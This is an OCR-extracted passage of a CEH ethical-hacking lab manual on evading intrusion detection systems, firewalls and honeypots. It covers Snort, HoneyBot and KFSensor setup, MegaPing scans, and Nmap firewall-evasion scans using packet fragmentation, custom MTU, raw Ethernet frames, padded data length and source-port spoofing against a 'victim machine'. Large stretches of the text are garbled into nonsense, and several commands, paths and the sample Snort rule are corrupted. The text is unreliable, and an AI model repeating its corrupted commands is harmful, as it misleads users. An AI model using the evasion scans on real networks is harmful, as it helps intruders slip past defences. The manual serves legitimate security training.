CEH Lab Manual Evading IDS, Firewalls, and Honeypots Module 12Prva F ove tale BL webercie CD wirtest ere roots demonstrated in ‘his lab are Moduie 12 Evading IDS, Firewalls, and Module 12-Evadng 05, realy an Hones Intrusion Detection Systems An intrusion detection sytem (IDS) is a deviee or software application that ‘moniter networks and] or systems for malceus activites or policy vilatons and produces reports to a management station. Lab Scenario Adoption of Interme use throughout the business word has in tam boosted network sage to protect their neworks, ongnizaons are sig vavious Security messuses such as firewall, intrusion detecion systems (IDS), trusion prevention systems (UPS9, honeypo, and others. Network ae the moet prefered targets of hackers 0 ‘comptomiseorganization® secuity and atackers find new ways ta breach networks sd attack target oxpaciatcns, "To become an expert Penetration ‘Tester and Security Adminstrtor, you must ‘posses sound knowledge of network intrsion prevention systems (PSS) ntrosion ‘deteaion systems (IDS), malicious network activity, and log information. Lab Objectives "The objective ofthis ab i to help students learn snd deveet intrusions in = network, log, and view all log files I this lab, you wil lear how to: * Install and configure Saozt IDS Detect Intruders Using HoneyHot + Detect Intruders and Worms Using KPSensor Honeypot IDS Bypassing Windows Firewall Using Nmap Bypassing Firewall Rules Using HTTP/FTP Tunseling Bypassing Windows Firewall Using Memsploit Lab Environment ‘Tocomplee this lab, you wil eed: + A compute runing Windows Server 2016 machine * A computer nung Windows Server 2012, Windows 10, Windows 8 and Kali Linx as viral machine 1 WinPeap divers installed inthe Windows Server 2016 machine Notepad++ inal in dhe Windows Server 2016 machine Active Pet installed in the Windons Server 2016 machine o nan Pel serps 1 Adkminstatve prvlages to configure sings and run tools A webbrowser with Intemet access ‘ica ating nd Gomes Cop Oy EE MiRgpaaaonat pede Sey PantGrate ‘overview Gian Mae 12- Evading 16, Frew art Moneyoats Lab Duration “Vim: 99 Minutes Overview of Intrusion Detection System Aninimson detection stm (ID) a device or voftware plc ht monies tet ni/or pnt rooney ox pey vee ae pecccen cpu caine! Gul Gis lie any depo dep at sou but tin bib pied ar eof ofa onheang ym, nado, Cnpmtatons we IDPS for oter purposes, such at Henan problems wi seraniypolcks, documenting exising tet, aol deen Haves Som violating sesy polices IDPSe have become a neces ation io the scary Innere of tal rey ongizon. Many crpninston con ao spond to dtc eat by costings Todo, IDB sever reponse ecu. that involve their stopping the atuck itself, thus changing the security environment. IDPS ate primary focused om identihng possible incident, logging infoemation about them, attempting to stop them, and reporting them to security administrators. Lab Tasks Pick an organization that you felis worthy of your attention, “This could be an ‘educational instntion, a commercial company, or pechaps a aonprofi chai. [Recommended labs to esist you in wing the IDS are + Detecting Inrasions using Sort + Detecting Malicious Network Traffic using Money@oT Detecting Intruders and Worms using KFSensor Honeypot IDS + Bypassing Windows Firewall using Nmap Evasion Techniques + Bypassing Piewall Rules using WTTPIFTP Tunneling 1 Bypassing Windows Firewall uring Matasploit Lab Analysis ‘Aips ec docoment ine ecm othis ab exci Provide our opinion ofyour ang smuy ponte and exposure PLEASE TALE TO YOUR INSTRUCTOR IF YOU HAVE QUDvn F texan J tne Bl wevenrcte 1D) Wactook wir Pacer. ToolscEMVIO Module 12, Evading 10S, Firewalls, ane Honeypots Motul 2: Evading 105 Frown and Honeys Detecting Intrusions using Snort Smart sn spn suc esers IDS IPS. Lab Scenario “The gal ofthe Ininsion Detection Aras isto nd penile stacks aioe 2 nenwon. The past few yas Inve wiiesed signin inexe in DDoS aac ‘on the Item, making mene sca «pest concer. Anat mastdo his by ‘raining IDS log and packet apres and combonang them with Grewal ge, loown valaembilte, and general trending da rom the Internce. IDS aac se ‘coming moreeurd stoma soning the rack sentiosinceal tie nd categong them has become a crkealcalenge They rena in hoge amounts of ‘ta and fom ds da, analyte must look for some kind of patter. Howeve, he ‘overwhelming flow of events genet by IDS sensors makes it hard for sciity ‘nists wo uncover hidden tack plans ‘To become an exper Penetration Tester and Security Administrator, you must poses sound knowlalge of network IPSs, IDSs, malicious network activity, and lng information. Lab Objectives "The objective of ths lab i to have sods lear abous, and understand IPSs and TDS Inthis ab, you will nee to: ‘+ Instill Snort and vsify Snort alers 1 Configure and validate snortconffile 1 Tes working of Sor by earning outatack txt ‘+ Penn Intusion detection ee Reha owed pmacions bey ReBras Mae 12- Evading 16, Frew art Moneyoats Lab Environment "To complet this lab, you will nx A computer running Windows Server 2012 a vreeal machine Windows server 2016 running ar the Antacker machine Soot located at ZACEH-ToolsCEHV10 Module 12 Evading IDS, Firewalls, ‘and Honeypots intrusion Dotoction ToolsiSnort You can dowmload the latest venion of Sort From tps snort.orgidownloads, Ifyou deride to download the test version, sexcensts might difer * WinPeap drivers insalled on the Windows server 2016 machine Notepad++ insallal on the Windows server 2016 machine 1 Administasve prvlgges to configure seins and ran tools Lab Duration ime: 20 Minates Overview of IPSs and IDSs [An intxsion prevention system is a network security appliance that monitors networks and systems for malicious activity. The IPS's main funetions ae to identify malicious activity, log information abous it, attempt to block/stop it, nd tepor ‘An intrusion deteaion system is a device or sofware application that monitors a ‘nccwork and or systems for malicious activity of paliy violations and produces {reports to a management station. The IDS performs intrusion detection and stlempis to stop detectad incidents Lab Tasks 1. Launch the Windows Server 2042 virtual machine, Install ort. 2, To install Scary, navigate to ZICEH-TooeICEHV10 Module 12 Evading 108, Firewalls, and Honeypts intrusion Detection ToolsiSnort. 3. Doubledick the Snort 2.9.44 Instalerexe fle. The Snort instalation wizard appears 4. fan Open Filo- Security waming pop-up window appears dick Rum. a i toaral Kneis saeMatt 2. Evading 105 Prova amd Honeypot 5. Accept the Liconso Agroomont, and insull Snort by sdecting tbe default ‘opsions that appear stop by step inthe wizard cone Areanert ese eer Bene arabe arg Set 29.1 ‘esPapeboe ee hereto he apeere sein roa een g eenal ee eee ee Teeceraanit Ge Coe) POM Ltbes donee 6 A window pen fer neces nsllain of Son. Ck ae, Besraee ‘Gi Men PaMatte 2-Eveding 105, Feewally an Honeypot 7. Glick OK 10 ex the Snort instatation window. (Note: Soor requires WinPeap tobe insulled on your machine, Neeson two ao be wie ihn the eyo the Soa nation reno pes ony mao mescaton ofthe Sot ec fowotnee Ns our ranula these coffe “Fa pape paso rototnatbe rate es 8. By dei Snort instal indin CaSnort(:\ oF DA, dependingzon te dle deve in which the OS is osale), 9, Navigate tothe ete olde in the specified location, 23CEH-TooliCERV10 Module 12 Evading 108, Firewalls, and Honeypotsiintrusion Detection ‘ToolsSnortsnortrutesiate of te Stor rules, copy snort conf, al pase it inGssnertete. 10, snort.cont is lady preset in €aSnortete; replace i with dhe Snot rues snorticont Ele 1, Copy the #0 rules fuer fom ZHCEMTooIsICEMVIO Module 12 Evading 105, Firewalls, and Honeypotslntrusion Detection Tool\Snortsnortrules and paste tin CaSnort. 12 Copy the proproe rules folder fm ZICEMTooIsICEMVIO Module 12 Evading IDS, Flrewalls, and Honeypotsimntrusion Detection ‘Tools Snortsnortrues, an past tin GxSnort. The preproc. ruts folders slready present in GASmor replace this folder with te proprecruls folder taken from sort rule. 13, Ie the same way, copy the rules folder from ZACEN-TeolsiCEHVI0 Module 412 Evading IDS, Firewalls, and Honoypotslnirsion Detection ‘Tootesnortsnortruts, a pase icin CiSnort. The rules folder is already present in C#Snort; cepace it with the mules folder taken fom ZACEH- Tools\CEHVI0 Module 12 Evading IDS, Firewalls, and Honeypotalintruston Detection ToolaSnortenortrules Meal Pit ‘Bi nding nd Gomes Gore Homa Taisho eed mecca a eeMa 12-18, Frei ae Herp 1M. Now mivigate to €aSnort and Shift ght ick bin; click Open command ‘window here fm the context menu to open iin command prompt Brasns 15, Type anort and press Enter Verify Snort Alert Ui = 16, The tnkiaization Complete message i displayed. Press Ett, Snort exits snd comes back to C#Snortin [Now type snort-W.his command iss your machine's physical adres, IP sxkress, and Ftbemet Drivers, but ll are disabled by default. 18, Observe your Ethernet Driver index number and write it down Gn this aby 19, To cole the Ethemet Daves, isthe command prom, ype snort ow 44 and press tnt, ‘ea Lak Maat Fas Ted Haka Ou ror)Matt £2 Eening 0, Frowal an Hoeypots 20, You sce a rapid scol ex in the command prompt, which means thatthe Ethernet Driver's abled and working propely 21, Leave the Snort command prompe window open, and launch another comma! prompt window: 22, Ina new command prompt, typ ping google.com end press Entor. F voentessnertMatte 2-Eveding 05 Feewaly an Honeypot 224, Close both command prompt windows The vtificaticn of Soon instalation snd wiggesing ale. is complete, and Snore is working comecdy in verbose mee. 25, Configure the snort.con! ile, located at Ga6nortate, 26, Open the anortcont ile with Matapadtes, ‘snortconf File 27, ‘The snortcon ie opens in Notepad++, as shown inthe screenshot Bran Bloggin Poteet, ICU AS Nae 28, Scroll down w the Stop #4: Sot the notwork variables section (Line 41) of snorcconf fl: In the HOME. NET line (Line 45), replace amy with the IP seidestes oF dhe machine (arpee mache) on which Snort is sunning, Hee, the target muchine is Windows Server 2012, and the IP adres is 10.10.02, ‘Note: ‘This IP addres may vary in your lb envionment. ED nage nse Roeper te cemomer 29, Teave the EXTERNAL NET any linea, 30. Ifyou havea DNS Server, then make changes in the ONS. SERVERS linc by replacing SHOME NET with your DNS Server IP adress otherwise, lave this ine ati ‘ait aw Paco ie Hing Gomes Corp Py CE Tipit pentose eetatl 12- Evading 15, Preval and Honeyeats Dinaeign eee aap ame tagger Nepaee OLSON 3 the same apes to SMTP. SERVERS, _ HTTP SERVERS, SQL. SERVERS TITNED SERVERS, and SSH_ SERVERS. 32 Remember aif you dont have ay serves ring our machin ave felines ils DO NOT ma ny hangs inate 32, Serol dowa to RULE PATH (ine 10, In Line 104, placed wi {Senet in ie 105 ce on run th Ono aan in Tine 106 mle pepe lee vr Cxteertprepe re. ee IGE 11a Cage Nae Dteiatatetgeent ecto frmorneeminte 38, Navigate w €8nontnues, and create vo text les name them white st a black fist and change their fle extensions from xt to sles 536, While changing the exession, if any pop-up appears click Yew, 37, Switch back o Notepad +, soll down to Stop #4: Configure dynamic loaded ibraries section (Line 238). Configure dynamic loaded Worares in ‘is section JR At the path to dynamic preprocessor Hbnaics (Line 243), replace ‘usrocaltinsnort dynamic preprocessoe with your dynamic preprocessor brass folder location. ‘Gata heeMotus 2: Evading 105 Frew on Honeypate 39. ln this kb, the dynamic preprocesor bares are located at ‘iisnortusnort dynamicpreprocessor, 40. At the path to base preprocesior (or dynamic) engine (Line 246; replace Iarlocaltivsnort dynamicenginalibef engines with your iase ‘peprocesor engine C48nortiiBionort dynamicengineit engine. 4. Comment () the dynamic rules bears line as ys lady configured the [bras in dynamic preprocessor Hirai (Line 245), 1D epee str etic oe siccmbelyate ‘Sezer eapen GLI 4 Grip SN 42. Scroll down 10 Step #5: Configure preprocessors ston (Line 252), the listed preprocessor. Do noting in IDS mode, bu generate rors at runtime. 43. Comment cx al the preprocessed inthis section by adding # before ‘each preprocesor rue 251-255. a GLI 1 Gx Son eth Nagl> ‘Sar want yo ‘Ti tings Commons apy KEE Bienen upeactont weed MakeMotu 12 Evading 05 Frew and Honeyots 44, Scroll dows tone 325 ane delete tama keyword NGL Gig Sona Noga 45, Scoll down to Step #6: Configure output plugins (Line 512) n this step, ‘rovide the ation ofthe etase cation config ind reference. config is 46, ‘These to fils ate in Catnortet. Provide this location of Hes in config ‘output plugins (Lines 531 and $32) .c, CSnortietcelassfcation config and CiSnortetereference conf a {ous GL PCat ener = ‘Gia enn Po "oc Haig Grane Capi Hm ‘itn tecnal Romacties Sed PotsDre prea ett ah Lehre ‘Gan cabo aie Mog 2. enn, Frowatls and Honeypte 47, ln this stop 86, ad the ine 623) output alot fast alerts, for Snort 1» dump all log in the aorta. le GL Guten eNom 48, Io the snortconf fe fl ane place the var srg with wae. To do this res Ctrieh on keyboard, The Replace window appears, enter iar inthe Find what : xtc, cater var io the Replace with : text fed ane click Replace Al, 49, By def, the string is var, whic isnot reognized by Soon, so replace it ‘with thewar string, and then elose the window. Note: Snort sowr supports maliple configurations based on VLAN Id of IP subnet within 2 single instance of Snort. This allows administrators to speci tulip snort configamtion fies and bind exch configuration to one of More VLANs or subnet rather than runing one Snort foreach configuration required, oven Se sox te) lteter veer nee vee ase Mirage teed Wd epi mpresan nee nene ct agro "voting Guna Coprah 0 6 ame Tiiisieres peset tc esMa 12-Evding 18, Frew ort Honeys 50, Click Glose to close the Replace window. 51, Goto the ins 804509 and remove backslash at the end of each ine (any). Dregs tenesns spaces Soren eed 2:tgpt maton GE an Canpages Norm Sings 52 Comment cut the lines 604509, as shown in the scroeoshot: 2 mate sopsh ‘Stonyouse ming Z "CRE 3 aggre Nee noe 53, Save the snort.conf file. SAERISSANR. 58 Before runing Snon you oa o enable detevion rues in the Ser: ies eee file Fortin, we have enable ICMP also tha Snortcan detect any hem. Sara elscoery ping probes tothe stan muni Sore ae 58, Navigate to CtSnortrulos nd open te lompinfasules file with Notopad = fehauaaeeess ee, Gata "ite ingen Ganesan Cope hija hecrel pease sac Mate‘Mott 2-Evaing 1, Prewal ar Honeys 56. "Type alert lomp SEXTERNAL NET any > SHOME NET 10.10.10.12 (m=g"IEMPINFO PING; icode:; ype:B; reference:arachnids;135; ‘referencescve 1990-0265; clasatypeshadanknown; sié472; rev) in ine 2l,and sve ‘Note: ‘The IP addres (10.10110.12) mentioned in SHOME_NEY may vary in yer lab environment. "ROU 12 gp ana le Na 57. Now, navigate 10 €#8nort and Shiftright click folder bin, select Open ‘commana window here from she context men to open it inthe command prompt S58. Type anort-B1-A console c €:Snortetcanortconf 4 C\Snortlog -K asc and press Enter to siart Snort (pace X with your device index sumber: in thie labo 1. 59, Ifyou recrve a fatal eror, you should frst worfy thar you have sped medications correly into the snort.eont file, an then seach thigh the Sle for entries matching your fal eror mess 0. Ifyou receivean error stating “could not create the registry key” then run the command prompt as an Administrator G1. Soort stats running in IDS mode. It fist intalzes output plugins, preprocessos, plugins, loads djnamic preprocessor brates, rule chais of ‘Snot and then loge al sgeatures, ‘Sar tab wt Fw ie aig nd Camano Cash ym Tighe knees Rpmshchns sch oe62. you enter all the command information corey you recive a comment stating Commencing packet processing ard press Enter, 16, You are prompted for the fip credentials of the Windows Server 2016 machine. ‘caitaaten Pe ‘Bia Hang nd Gomes Cori hy SOC Tipindowel upeantons tedsterMale 12- Evading 16, Frew an oneyoate 17, In this lab the IP address of Windows Server 2016 is 40.40.40.46, which may differ in your lab environment. Note: If kali gives an error saying fip command is not found, then install fp through “apt get install fp command reot@kali = Fie Edt View Search Terminal_Help 18. Switch back to Windows Server 2016, and expand the Ports and Remotes nae a the left side of the HoneyBor dashboard 19. Under Ports, you can see the port numbers from which Windows Server 2016 received the requests or stacks, 20, Under Remotes, it records the IP addresses through which ic received the sequest, 21, Now, rightclick any IP address or Port on the left, and click View Details, as shown in figure, to view the complete denils of he requestor attack recorded by HoneyBot. Alalaes| 22 A.e} 22. The Packet Log window appears, as shown in screenshot. It displays the complete log deals of the request captured by HoneyBot. 23. In the screenshot, under Connection Details, you can sce the Date and "Time ofthe conacetion established, and She protocol used, Sane Moat "ica Nning an Gomes Capra hy Ema Thue Koen econ oy ooModule 12 sadn OS, Fenian Honeypot 24, also shows the Source IP, Port, and Server Port, asshown below. 25, Simultaneously, you can run the telnet command on the Kali Linx ‘machine end observe the log recorded by MoneyBet on Windows Server 2016. Lab Analysis ‘Ammlpr an document the ssl eet hsb eee, Pande yor opision ‘of your’ sectiy postr nd expore though publi and fe infrmaton PLEASE TALK T0 YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Yes EINo ‘Platform Supported i Classroom Zilabs Sara Mama Pee ‘ica iting Gomermems Cop EE “Sighs Rocras oy Sey PoeMotte 2. Evading 105, Prova and Honeypot Detecting Intruders and Worms using KFSensor Honeypot IDS Sener it a Window based bongpet IDS. Lab Scenario 7c , SEMEL. nian deeeson pas hey rl nents the inegty of a syste sci i Navwrk Iris Daecon Systems (SIDS) have agg ben the bot metodo rey {eotifing anal, KISeneor an NIDS tat i xy to nal ad eg NO spot dua cape td efient dig hale to nn re on bm Bi wtsemie Spcticaion Windows machines Dsanontevies ‘To bexme an expert Penetnton ‘Tester and Scuiy Administer, you mast owes sound knowledge of network IPS and IDS, ety network nacoas {cry and log infomation nd cp or block macons nerwork act. Lab Objectives > zxcen The objecve ofthis ab is Sor stants o lean and understand IPS and IDS. ToolsiCEMVIO Inch la, you wil Module 42 Ereding 106, * Detect hackers and worms & setwork Serene sed Provide newark sccty Honeypots Lab Environment “Yocomplete this ab, you will acd + Ki Sensor lest 21CEN-ToolsCEHVI0 Maule 10 Deniatot Serica Honeypot Tools MFSonaor 1 KPScnsor insted Windows 40 1 MegaPing located st 2ACEN-Tools CEHV10 Module 12 Evading 105, © voce Fowl, and Honeypots Honeypot Tools MegaPing Mcrmemacane MeguPing installed in Windows Server 2016 Gaiam neo Ci tng denne Co Tagine Ros acon eb aeBrass Peta ‘eal Hang an Gunes Cap O76 Mate 2-Evedng 1, Frewaly nd Honeypot Ifyou have decided to download the test of version ofthese tools then screen shots might difer = Administative privileges to contigute setings and ain tools Lab Duration “Time: 10 Minutes Overview of the Lab Sensor contains a poweefilintemet daemon service thats ult handle mlpe ports and IP adresses Its writen to resist denial of sevice and buffer overflow attacks ‘Bulking on this fleilty KPSensor can repond to connections in avaiety of ways, ‘fom simple port lstening and basic servies (auch as echo), 0 complex simulations ‘of standard system services For the HP protocol KFSensor accratly silts the way Microsoft's web server (IS) responds to both vabd and invalid requests. As ‘wellasbeig able to hort website italso andes complexities voch se range requests and dicot sie cache negotiations. This makes it extremely cific for an atacker fingerprint, or identify KPSensor a «honeypot. Lab Tasks ‘Note: Fosure that WinPeap is installed before rennin this ab, 1. Ie Windows 40 virwal machine, navigute to ZICEMToolsICEHVIO Module 10 DeniatotServiceHoneypot ToolsiKFSsensor snd double- lel isons Dama 2. Fa User Account Control pop-up appears, click Yes, 3. The KFSensor Evaluation Setup window appears; follow the wizard- deiven installation steps to instal the application, caret the Kane Eaton ‘tip Wad Myc tol Repent Se Peato ¥2- Evading 18; Fret ont Honeyonts 4. Complesed the KFSoncor Evaluation Setup wizard appears, uncheck Launch KFSensor option and click Fim, Completed the KFSerecr Evaluation ‘Setup Wizard Diane launch KiSensor ss Administrator, navigate co Start > KFSensor snd right-click on KFSensor > More > Run as administrator as shown in the screenshotModule 12-Eendng DS, roa al Honeypot 6, the User Account Control pop-up appeus, click Yos. “7. When the application is being launched forthe fit ime, the KFSensor ‘Sot Up Wizard appear; cick Caneel button. Up Wasrd * The KFSenso Set Up Wied wilake jou trough ‘number of steps to configue you system. [Aol these can conigutaions can be mocied ter tng te menu opr ‘You ig ike to read the mara a this point to ean how kFSensor works andthe eaneeps Behind Geting Stated Fotheb on the options the Set Up Wea Weed Heb as] Cae] 8. In the KSensor application window, click Sottings from the menu-bar and clck Set Up Wizard. 25 shown inthe screenshot: ‘Gitta pe ‘ial Hating Gamers ap iy me Wagicaoal Rodetont Seh RaetMote 2- Evading, Frew nd Honeyats 9. The KPScasor Sot Up Wizard window appeats; click Next button ‘The KFSoner St th Waal ae youth ow Sere waka once bh Get Sate Far nthe pore nto Set Up Wa 10, ln the Set Up Wizard - Port Ciasses window, check all the port classes to include and click Next. ‘Gin Lawn ‘ie Hang ng Gomera Cop © EO ma “Eiri peers ey aMa 12-Evding 18, Frew ort Honeys 11, Uncheck all the ports with all active native services 10 include, and click 12, In the Set Up Wizard - Domain window, leave the Domain Namo fed set to default ad click Wont. ‘ica tation Goaneeanons Copy Hae hija hecrel pease sac MateMatte 2-Eveding 05 Feewaly an Honeypot 13, ln the Set Up Wizard - EMail Alerts wicdow, leave the options set to default and click Next 14, In the Set Up Wizard - Options wizard 1 Sclect Cautious from Denial Of Service Options drop-down lst 1b Select Enable packet dump files from the Network Protocol ‘Analyzer drop-down list 15, Click Mex. 16, ‘Tis sets the DoS options to Cautious mode and saves the packet dump fils at the time of the DoS attack. Ea tpind-Opow Cart tonne earn om cuneate teh Come iat Seaweyet esos ‘om ong opt sald deals bey ahi an evert Sanna TS eas eS reerel ence a =e ee Tips owe pwacions ty eeeBigs Dressed iw 7 ve sesp Wnts ‘Struma ofS 2 saymrn vices Een oeessN Ca Mw Pa) Mae 12- Evading 16, Frew art Moneyoats 17. In the Set Up Wizard - Systems Service wizard, leave the option set 0 Sef an clck Next, Anans sences ampeca ord plese th Vindowrnnee te faligurdedi emis ncorontios Unitdeenae Tre KF Seat Serve neccnet reeerert dh oueeon net 2 oun (jell andenohe semen can op on wre ecarg ewe “The KFSea Serve cane covigand toa atonatcaly nhenthe sens ta, eve ere ou ‘Yeu agen atm nna tal tee serie LOLREAI2 Spm Se Re 18, In the final step ofthe Set Up wizard, click Fiiah, Upward Fah “The KFSenw Set Up Withrow gat ane efomston trees core you sen Toradip en aber g mee ck ton baw etn ated ete ane Evan Ven Mahe th in Kr en it pin ices erase Sane Fy oats Fave an ‘Seana pd ochre suena eos evga nich wt ine s/w kennel crac” "ical haan Gonaranns Caprh Kame iis tcerel Recast cs Matott 12. Even 1, Frowal and Honeypot Cdncxmaecane 18 Hyouwancco send KPSoneor alerts by emai, peiyemal des deal, ‘eso nna and cick Next. 2c" 20, Select options for Dental of Service, Port activity, Proxy Emulation, and Shep cm on [Network Protocol Anabjzor, and click Next. 21, The MFSonsor main widow appears. Ie displays the Ist of 1 protocata, Visitor, and Received automatically when i stats In the window Ghown blow) all the saves in the Left block erased with blue Kes ate the ports curently in use Sahu yas Dneromvinis RE 4 Ker Me oe Scion 22 Launch the Command Prompt ss an administrator From the Appa lis 23, Atthe command promi, type netstat Steam Pas Tia aking nd Gomme Ci Oy Em “arionend RetortMotu 12: Evedng 105 Frowals and Honeys 24, ‘This wll display list ofUstoning ports. Deer ier dtecsnt 25, Leave the KF Sensor tool mansing 26, Follow the wizard driven installiton steps to ns I MegaPing on Windows Brasx > Contigure . MegePing (ick on MegaPing ia the Stare menu apps, and cick 1 Agree GRR actingMott 2. Evang 5 Frowatls, and Honeyte 28 The About MogaPing pop-up appears; dc | Agree to continue, eeteee cere GLEAN are 29, The main MegaPing window opens, as shown in the screenshot AGUS Meigen abn Seta ica king wa Gomme Cop Oma tate aaon epaoclons ey aeMat 12 Eeadg OS, Frown and Honeypot 30. Select Port Scanner in the left pane. Drax Porton Pot 31. Entershe [Padres inthe Destination Address List ofthe Windows 10 (i ‘Scanning, ‘his ab 40.40.40.40) machine on which KPSenzor is mining, and click Ad. oy as isaanJ508 (Sea 7eo fa ssi GE Aight 32 Check the IP adress, end dick on Start button to star liteing to the tfc (on 10.10.10.10, ‘Note: This TP adktess may vary in your lb environment. ee) a (D siieris shiny Sea pert [34 ‘The image below shows the denticaticn of Telnet on port 23. 3, MegaPing beyns to scan for open ports and dpays i of ports, ‘Cee Nama Titi aca nd Gomera Grr FEE Tiijaawrad Rguseconssach Mesa£2 steven She cater Presence Sinbad Grtavtes bt UREN gg Tso 36, The image below shows the identifatin of Seeks on port 4080, witch sllows intruders to connect to the machine trough afew aesieevevisio i ieee Saonne URE Meg ihe 37. Now, swith back so the Windows 10 vim machine. Observe that [KF'Scnso has detected that port 28s open on this machine. ‘ica Hing and Grnmenans Caprsh Ham Tiigieowral tpwanckn ssh atoMatte 12-Evadng 15 Frewala n Honeots — {38,Sceing ths por open, you.ean take prope secutity measures to close the port, Biases thereby preventing ierudes from connecting to this machine ftom outside. ‘Analyze the 2 teoeriaton brag eae be Seca 39, ‘The abowe image also displays the data ofa Death Trojan on port 2. Sexing, this por open, 2 neworc administrator con adda firewall rule to block port 2 thereby securing the system from being affected by Death Trojan. Lab Analysis Alc and document thers elated otis exer. Prove your opinion ‘of your tng’ searty poste and expose PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS OYes No ‘Platform Supported © Classroom Ditabe eet Ie Tiled Heigl Goreme Core Oh TEipuciaeral epeactons ny oevitae 7 tensor tees Bl Wisernise D wanton vi Te ay Ted eng ad Gomera Matte 12- Evading 15 Frewaia nd Honeyots Bypassing Windows Firewall using Nmap Evasion Techniques [Ninap ofr: many option fr Fenelon sich we espe i he eh Lab Scenario Firewalls and IDSs ae intended to avoid port waning tol, sch ax Nap, from geting paces menus of police cn of the Geinewers whit, thee ensuring Indeed, we ougit nen be coneeraed about this toa certain dlpen nthe round that Nop has taxneows fates cited acl 69 typsse dese preectons. It has the abit wo ive you a mapping ofa sytem famework, by which you ea ee everthing from OS renditions to open ports “Birewalls and interruption zecognin frameworks sre made to keep Ninap and ‘other applications from obtaining that data As a pesctation tester, you will come across systems behind Srewalls that prevent you from geting the information you want. So, you will need 10 know hhow to avoid the firewall rules in place, and to pean information about & host. "This step in apenetraton testi alled Firewall I5vasion Rules. Lab Objectives “The objsive ofthis bint hp student lar how to bypass» faroal sing Now. Lab Environment “Tocomplets this ah, you wil need + Acomputer runing Window Server 2016 4 Kai Lin ronning in Vital machin (tucker machine) 4 Windows 10 unningin vital machine (Vim machin) +A web browser with Intemet acces + Administrative privileges to run toolsEmrtrey “Turn on Windows Mott 2. Evang 05, Frowats and Honeypot Lab Duration ‘Time: 10 Minutes (Overview of Lab [Network cbstnicions such a firells can make mapping a nrwork exceedingly lifcut To make things more ditficl, sifing casal reconnaissance soften # Key {goal of mplementng the devices. Lab Tasks 1, Before runsing this lab, log into the Windows 10 virtual machine, and ‘open the Contra! Panel; a the All Control Panel lems window, eicle Machine 2. ‘The Windows Firewall window sppears; click Use recommended settings to ra on Fall: aa 3. Otserve ta the Windows Freal Stat is Om : fe so oe Dn ce pn ron A. ‘Sicha tthe al Li eache eich Soma ea window, ype the allowing command wrap 08-18 iP Adrens of te ie ache» nd fe ts aka ea “Siigattanct area ‘Seva etModul £2 Evan DS, reuaile and Honeypot 5, In this lab, the victim machine's IP address is 40.40.40.40 (Windows 10), ‘which may vary in you lb environment. 6. ‘The -wswitch is sed to increase the verbose level, the 68 switch is used to perform TEP SYN scan, and the Tis used to setting a time template to perform sca. “This command provides you with the TCP SYN scan ouspat, 2s shown in this sereenshot ofthe targeted machine (e, Windows 1), Doraexs Perform st Vcr Sem Terie ‘TCP SYN Sean 8. “Type nmap v -s8 4-75 ard press Enter 9, this command, we ae adding an addsional switch which causes the requested sean Gncluding ping sears) to use tiny fragmented IP packets to be seat to the victim machine. This option ean bypass the packet inspection of firewalls, Sa ‘ica ting Gmc Cop Oy Em10. "Type nmap-v 26-4 -mtu 22 -TS and press Enter. 1, ‘The --mnu switch is wed 10 set a specie Masimum ‘Transmission Unit to the packet, so it specifies mos as 32 packets in this command. If you ‘want set an MTU, it shoold be multiple of 8% 16, 24, 32 ete) 12. In this command, during the scan, Nmap will create packets of a size ‘based om a user provided number. Tn the screenshot below, we provided a packet size of 32 so that Nmap ‘ill teste packets oF 32 bytes cating confusion for the Firewalltase Mate 2: Evading 105, Frewala and Honeypot 14, "Type nmap-v 26 -mtu 32 ~sondoth -75 <1P Address of the Victim Machine> and prest Entor, 15, seend-eth ensures that Nmap actly serls Ethernet level packet, anc will bypass the IP layer and send raw 16, Now, launch Wireshark on the Walt Linx machine 10 observe the packets. To lauach Witeshark, open a new command terminal, type ‘wiroshark and press Enter 17. The Error during loading pop-up appears; click OK to continue, Wireshare o ua: ror during loading [string usrshare/wirsharkint ua") 44: dof ha been sable due to running Wresbark as superuser, See https] ik wiresharkorg/CaptureSetupCaptrePriieges for help in runing Wireshark as an unpivleged user. x Tied Hang GussieMute 12-Evedeg 1, Prowl nd Honeypot 18, The Wireshark rain window appears; now, choose the Interface 10 capture the tfc, nd double click to start eapruring trafic. Ho 49 Waa Sane py Fae 19, Now, Wireshark will open in capturing mod as shown in the screenshot, sand setum to the nmap command terminal window: BEES 20, Type nmap + 28 4 mtu 32 -send-eth -datelongth 500 -TS and press Enter. 21, Nmap nonmlly sends minimalist packets containing only a header; bere, ‘ve ar setting s dats length up to 800, 22, The TCP switches ate genetaly 40 bytes and ICMP echo request are jst 28; some of the UDP ports and IP protocols will get a custom payload by defait. Sea Namal Pas ‘Bia Hang nd Gomes Cop hy FO nein nol peiclons a tesMa 12-Evding 18, Frew ort Honeys 23, Sothis switch will append the given number of random bytes to mast of the packets it wll send, 2nd wil not use any protocob-pecifc payloads. maximize the Wireshark window, navigate to Capture, snd click Stop to stop the running capaure. Re SCR heeModule 12-Evadr DS, Prowl al Honeypot 25, Watch the TEP SYM packets traverse through the attacker machine and ‘on to the victim machine. Observe the frame size and data bytes sent to ‘he victim machine. AGUNG Meee 26, Once you have observed the eaptted traffic through Wireshark, go to ‘Capture, and click Start from menu bar, xo that Witesbark will start ‘capturing the tfc agin 27. The prompt De youwant to save the captured packets before starting ‘a new capture? appears; click Continue without Saving 1 start a new capture Unsoved packets o| ‘0 you want to save the captured packets before starting 2 ew capture? ‘Your captred packets wil be lst you dot save them, (Contnie without Sang) Cancel ‘Gata an 0 "ital Hadid Onameracaus Ger © mm SiR Rawal RecetasMatte 12-Evadng 15 Frewala n Honeots 28 Type nmap -v-26 mtu 22 -send-eth ~date-length 50 ~source-port 99:75 aod press Enter, ~source-port is used to spoof the source port umber We re providing port 99, through which Nmap will send the packets. Most of he seanning ‘operations will use raw sockets that inelsde SYN and UDP sea, 30. Now, maximize the Wireshark window, and Stop caprusing tfc, a5 shown in the Figure below. ‘SaaS tm Pw not Games oSMotte 12-Evedg 10, Prova, nd Honeypot 51. Expand the Transmission Controt Protocol, and oisrve that trafic is forwarded through the port that we have specified in the command. Lab Analysis ‘Analyze and document the ress relate to this ab exercise, Provide your opinion | of your targets seetity posture and exposure through public and fe information, PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Platiorm Supported ‘Bia singed Gomes Coie Tikeckinwen! peroneal saeDWord ew Module 12 Evang OS Frown ond Honeypot Bypassing Firewall Rules using HTTP/FTP Tunneling HITTPortis program from HVT Hast that creates a anparet tae cagh a prog ver oral Lab Scenario Atacker ate alway looking for utes who can be cally compromised so that they can enter networks by IP spoofing to steal data. Hackers can get packets ‘through Frewalls by spoofing IP addres, If amackers are able to 